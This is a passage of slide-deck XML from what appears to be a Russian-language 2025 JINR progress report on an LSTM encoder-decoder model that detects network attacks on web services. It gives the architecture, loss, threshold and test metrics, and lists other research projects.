                <a:t>target_indexes</a:t>
              </a:r>
              <a:endParaRPr lang="ru-RU" sz="11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000" b="0" u="none" strike="noStrike" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uFillTx/>
                  <a:latin typeface="Courier New"/>
                </a:rPr>
                <a:t>(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ru-RU" sz="1000" b="0" u="none" strike="noStrike" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uFillTx/>
                  <a:latin typeface="Courier New"/>
                </a:rPr>
                <a:t>batch_size</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ru-RU" sz="1000" b="0" u="none" strike="noStrike" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uFillTx/>
                  <a:latin typeface="Courier New"/>
                </a:rPr>
                <a:t> = 8</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" b="0" u="none" strike="noStrike" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uFillTx/>
                  <a:latin typeface="Courier New"/>
                </a:rPr>
                <a:t>)</a:t>
              </a:r>
              <a:endParaRPr lang="ru-RU" sz="10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42" name="Прямоугольник 341"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2151720" y="3406320"/>
            <a:ext cx="1177920" cy="2233440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="8E86AE"/>
          </a:solidFill>
          <a:ln w="36000">
            <a:solidFill>
              <a:srgbClr val="55308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u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>Encoder</a:t>
            </a:r>
            <a:endParaRPr lang="ru-R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u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>LSTM</a:t>
            </a:r>
            <a:endParaRPr lang="ru-R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43" name="Прямоугольник 342"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5778360" y="3392640"/>
            <a:ext cx="1168560" cy="2233440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="8E86AE"/>
          </a:solidFill>
          <a:ln w="36000">
            <a:solidFill>
              <a:srgbClr val="55308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u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>Decoder</a:t>
            </a:r>
            <a:endParaRPr lang="ru-R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u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>LSTM</a:t>
            </a:r>
            <a:endParaRPr lang="ru-R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44" name="Двойные круглые скобки 343"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3792960" y="3993840"/>
            <a:ext cx="1427760" cy="1137600"/>
          </a:xfrm>
          <a:prstGeom prst="bracketPair">
            <a:avLst>
              <a:gd name="adj" fmla="val 17129"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="36000">
            <a:solidFill>
              <a:srgbClr val="55308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ourier New"/>
              </a:rPr>
              <a:t>hidden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5" name="Прямая соединительная линия 344"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1784160" y="4534560"/>
            <a:ext cx="343440" cy="360"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="36000">
            <a:solidFill>
              <a:srgbClr val="55308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6" name="Прямая соединительная линия 345"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3331080" y="4523760"/>
            <a:ext cx="459360" cy="360"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="36000">
            <a:solidFill>
              <a:srgbClr val="55308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7" name="Прямая соединительная линия 346"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5250960" y="4552920"/>
            <a:ext cx="527400" cy="360"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="36000">
            <a:solidFill>
              <a:srgbClr val="55308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348" name="Соединитель: уступ 347"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="335" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4946760" y="-1504440"/>
            <a:ext cx="1271880" cy="9242640"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 34258"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="12600">
            <a:solidFill>
              <a:srgbClr val="3465A4"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="349" name="Группа 348"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7475400" y="3868920"/>
            <a:ext cx="1642680" cy="1374480"/>
            <a:chOff x="7475400" y="3868920"/>
            <a:chExt cx="1642680" cy="1374480"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="350" name="Прямоугольник 349"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7475400" y="3868920"/>
              <a:ext cx="1416960" cy="1191240"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="DEDCE6"/>
            </a:solidFill>
            <a:ln w="12600">
              <a:solidFill>
                <a:srgbClr val="55308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8480" tIns="33480" rIns="78480" bIns="3348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ourier New"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="351" name="Прямоугольник 350"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7593840" y="3966120"/>
              <a:ext cx="1416960" cy="1191240"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="DEDCE6"/>
            </a:solidFill>
            <a:ln w="12600">
              <a:solidFill>
                <a:srgbClr val="55308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8480" tIns="33480" rIns="78480" bIns="3348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ourier New"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="352" name="Прямоугольник 351"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7701120" y="4052160"/>
              <a:ext cx="1416960" cy="1191240"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="DEDCE6"/>
            </a:solidFill>
            <a:ln w="12600">
              <a:solidFill>
                <a:srgbClr val="55308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8480" tIns="33480" rIns="78480" bIns="3348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100" b="0" u="none" strike="noStrike">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uFillTx/>
                  <a:latin typeface="Courier New"/>
                </a:rPr>
                <a:t>output indexes</a:t>
              </a:r>
              <a:endParaRPr lang="ru-RU" sz="11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53" name="Прямая соединительная линия 352"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6948360" y="4531320"/>
            <a:ext cx="527400" cy="360"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="36000">
            <a:solidFill>
              <a:srgbClr val="55308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4" name="Прямоугольник 353"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3767040" y="5274720"/>
            <a:ext cx="1503000" cy="279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i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latent representation</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU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5" name="Прямоугольник 354"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9745920" y="4135680"/>
            <a:ext cx="2211840" cy="138924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00" b="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>CrossEntropyLoss(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0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>    output_indexes,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0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>    target_indexes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0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>) → min (Adam)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6" name="Прямая соединительная линия 355"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9119520" y="4542120"/>
            <a:ext cx="527400" cy="360"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="36000">
            <a:solidFill>
              <a:srgbClr val="55308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7" name="PlaceHolder 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720" y="89385"/>
            <a:ext cx="12189960" cy="4001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6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Модель обнаружения сетевых атак. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2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Логика обучения и архитектура</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2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966CD5C1-A496-48D0-AC20-25179B55A80D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D509AB3-890C-4635-AF75-EBC236230865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A7E560D-9EEB-43CC-ACFF-9BCA907817BF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10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Рисунок 358"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="89280" y="871560"/>
            <a:ext cx="6119280" cy="2805120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="36000">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="360" name="Рисунок 359"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect l="7002" t="5158" r="9332" b="2213"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5404680" y="3245760"/>
            <a:ext cx="6520320" cy="3006720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="36000">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="361" name="Рисунок 360"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:srcRect t="3169"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1650600" y="3449160"/>
            <a:ext cx="3516480" cy="2618640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="36000">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="362" name="Таблица 361"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6089400" y="1188000"/>
          <a:ext cx="5937840" cy="1892400"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="755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3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6320">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p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Precision (точность)</a:t>
                      </a:r>
                      <a:endParaRPr lang="ru-RU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05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Recall (полнота)</a:t>
                      </a:r>
                      <a:endParaRPr lang="ru-RU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05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F1-score (гармоническое среднее точности и полноты)</a:t>
                      </a:r>
                      <a:endParaRPr lang="ru-RU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Support (количество наблюдений каждого класса в размеченных тестовых данных)</a:t>
                      </a:r>
                      <a:endParaRPr lang="ru-RU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Accuracy (доля правильных ответов)</a:t>
                      </a:r>
                      <a:endParaRPr lang="ru-RU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05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Normal</a:t>
                      </a:r>
                      <a:endParaRPr lang="ru-RU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29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0.9809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29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0.9750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29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0.9779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29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1000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1429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0.9786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Anomaly</a:t>
                      </a:r>
                      <a:endParaRPr lang="ru-RU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29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0.9764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29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0.9820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29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0.9792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2920" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcAft>
                          <a:spcPts val="567"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU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1055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3" name="Прямоугольник 362"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6918480" y="1627200"/>
            <a:ext cx="731520" cy="440640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:pr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4" name="Прямоугольник 363"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7822440" y="1616400"/>
            <a:ext cx="750600" cy="440640"/>
          </a:xfrm>
          <a:prstGeom prst="rect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5" name="Прямоугольник 364"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10636560" y="1724040"/>
            <a:ext cx="1388880" cy="440640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:pr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6" name="Прямоугольник 365"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="89280" y="581400"/>
            <a:ext cx="3057840" cy="2887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i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Anomaly threshold: val_loss &gt; 0.8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7" name="PlaceHolder 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1080" y="89385"/>
            <a:ext cx="12189960" cy="4001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6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Модель обнаружения сетевых атак. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2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Проверка на тестовом наборе</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2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E6E67A50-616E-4CF8-8D43-6765F1A24D7F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64167EA-EDFC-401D-BB79-2874005AB238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F53AB28-C7AC-4B05-8D7C-0045A50D4E22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11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Рисунок 368"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="36000" y="1026720"/>
            <a:ext cx="5826600" cy="5230080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="36000">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="370" name="Прямоугольник 369"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="36000" y="680400"/>
            <a:ext cx="5959080" cy="34488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u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Результаты реконструкций аномальных запросов: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1" name="Рисунок 370"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6150240" y="1029600"/>
            <a:ext cx="6040440" cy="5181840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="36000">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="372" name="Прямоугольник 371"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6150240" y="683280"/>
            <a:ext cx="5971680" cy="34488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u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="00A933"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Результаты реконструкций нормальных запросов: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3" name="Прямая соединительная линия 372"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6006600" y="602280"/>
            <a:ext cx="32040" cy="5644440"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="126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480" tIns="33480" rIns="78480" bIns="3348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4" name="PlaceHolder 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1080" y="89385"/>
            <a:ext cx="12189960" cy="4001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6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Модель обнаружения сетевых атак. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2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Проверка на тестовом наборе</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2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sp>
        <p:nvSpPr>
          <p:cNvPr id="375" name="Прямая соединительная линия 374"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1437120" y="1885680"/>
            <a:ext cx="4426200" cy="36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6" name="Прямая соединительная линия 375"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1041480" y="1273680"/>
            <a:ext cx="4426200" cy="36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7" name="Прямая соединительная линия 376"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7521480" y="1885680"/>
            <a:ext cx="3283920" cy="360"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19080">
            <a:solidFill>
              <a:srgbClr val="00A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8" name="Прямая соединительная линия 377"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7125480" y="1273680"/>
            <a:ext cx="3283920" cy="360"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19080">
            <a:solidFill>
              <a:srgbClr val="00A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83733426-1747-497F-83B3-488A36502370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B30B4C4E-70CD-450E-A87B-08B6A29D3674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8C12792-B2FD-4956-9E71-5F5AD18835AA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12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Прямая соединительная линия 378"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5920560" y="867600"/>
            <a:ext cx="32040" cy="4892760"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="126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480" tIns="33480" rIns="78480" bIns="3348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80" name="Рисунок 379"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect b="1733"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="104400" y="945720"/>
            <a:ext cx="5680440" cy="4776840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="36000">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="381" name="Рисунок 380"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6029280" y="932040"/>
            <a:ext cx="6004080" cy="3981240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="36000">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="382" name="Прямоугольник 381"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="104400" y="717120"/>
            <a:ext cx="1848881" cy="367878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u="none" strike="dblStrike" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>False</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="18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ru-RU" sz="1800" b="1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anomaly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="18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: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3" name="Прямоугольник 382"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6089040" y="710280"/>
            <a:ext cx="1489808" cy="367878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u="none" strike="dblStrike" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>False</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="18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ru-RU" sz="1800" b="1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norm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="18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: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4" name="Прямоугольник 383"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="118440" y="5812920"/>
            <a:ext cx="10175760" cy="34488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i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Модель смогла правильно классифицировать данные, ошибочно помеченные при разметке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5" name="PlaceHolder 22"/>
          <p:cNvSpPr/>
          <p:nvPr/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6" name="PlaceHolder 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1080" y="89385"/>
            <a:ext cx="12189960" cy="4001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6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Модель обнаружения сетевых атак. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2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Проверка на тестовом наборе</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2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8D867B-DD89-4B0B-BEDF-85FF1373E494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6EB04A-4609-4611-A0F6-E7A17F10FFF7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5BD78A-D0CF-4563-ABFA-9678E06EDDC6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13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Выполненные работы за 2025 год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107640" y="666360"/>
            <a:ext cx="11806200" cy="5508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lnSpcReduction="9999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999999"/>
              </a:buClr>
              <a:buFont typeface="OpenSymbol"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="3200" b="0" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> Разработка и тестирование нейронной сети для обнаружения сетевых атак к веб-сервисам ОИЯИ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eriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="3200" b="1" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> Исследование методов агрегации векторных представлений текстов различных семантических пространств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999999"/>
              </a:buClr>
              <a:buFont typeface="OpenSymbol"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="3200" b="0" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> Работа над созданием алгоритма семантического поиска информации в базе данных цифровой карты компетенций по детекторным и ускорительным технологиям ОИЯИ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999999"/>
              </a:buClr>
              <a:buFont typeface="OpenSymbol"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="3200" b="0" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> Развитие веб-сервиса мониторинга производительности задач на ресурсах, интегрированных в распределенную инфраструктуру DIRAC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6AA01D-8C22-41DB-92DD-D5DD9A64FC97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5C91D1A-8208-438D-ADC9-E855D1AE1880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89759DF-D340-4B44-90FF-002D3228D9DD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14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0" y="166330"/>
            <a:ext cx="12189960" cy="24622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600" b="1" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="Calibri Light"/>
              </a:rPr>
              <a:t>Исследование методов агрегации векторных представлений текстов различных семантических пространств.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1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 Семантическое пространство</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1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pic>
        <p:nvPicPr>
          <p:cNvPr id="392" name="Рисунок 6"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4208040" y="651600"/>
            <a:ext cx="7767720" cy="5587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3" name="Рисунок 392"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="107280" y="783000"/>
            <a:ext cx="4042080" cy="3723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4" name="Рисунок 67"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="182880" y="4712400"/>
            <a:ext cx="2242080" cy="1271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Дата 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{877C1056-DE9A-4F43-8960-004DF417E787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44783511-1337-4BC5-A6A9-76B2DE88B218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B81DBEB-F7D2-4731-88CD-5E397D71490C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15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0" y="166330"/>
            <a:ext cx="12189960" cy="24622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600" b="1" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="Calibri Light"/>
              </a:rPr>
              <a:t>Исследование методов агрегации векторных представлений текстов различных семантических пространств. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1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Проблема агрегации результатов</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1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pic>
        <p:nvPicPr>
          <p:cNvPr id="397" name="Рисунок 80"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
